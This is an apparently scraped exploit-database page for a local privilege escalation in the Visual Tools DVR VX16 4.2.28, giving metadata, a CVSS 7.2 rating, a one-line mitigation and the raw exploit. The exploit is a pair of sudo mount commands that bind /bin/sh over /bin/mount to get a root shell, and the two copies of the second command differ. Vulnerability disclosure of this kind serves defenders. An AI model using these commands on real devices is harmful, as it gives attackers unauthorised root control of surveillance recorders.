header-logo
Suggest Exploit
vendor:
Visual Tools VX16
by:
Andrea D'Ubaldo
7,2
CVSS
HIGH
Local Privilege Escalation
269
CWE
Product Name: Visual Tools VX16
Affected Version From: Visual Tools VX16 v4.2.28.0
Affected Version To: Visual Tools VX16 v4.2.28.0
Patch Exists: NO
Related CWE: N/A
CPE: a:visual_tools:visual_tools_vx16
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: VX16 Embedded Linux 2.6.35.4
2021

Visual Tools DVR VX16 4.2.28 – Local Privilege Escalation

An attacker can perform a system-level (root) local privilege escalation abusing unsafe Sudo configuration. sudo mount -o bind /bin/sh /bin/mount sudo mount -o remount,rw /

Mitigation:

Ensure that the sudo configuration is secure and does not allow privilege escalation.
Source

Exploit-DB raw data:

# Exploit Title: Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation
# Date: 2021-07-05
# Exploit Author: Andrea D'Ubaldo
# Vendor Homepage: https://visual-tools.com/
# Version: Visual Tools VX16 v4.2.28.0
# Tested on: VX16 Embedded Linux 2.6.35.4.

#An attacker can perform a system-level (root) local privilege escalation abusing unsafe Sudo configuration.

sudo mount -o bind /bin/sh /bin/mount
sudo mount

Navigation

Suggest Exploit

Services By CQR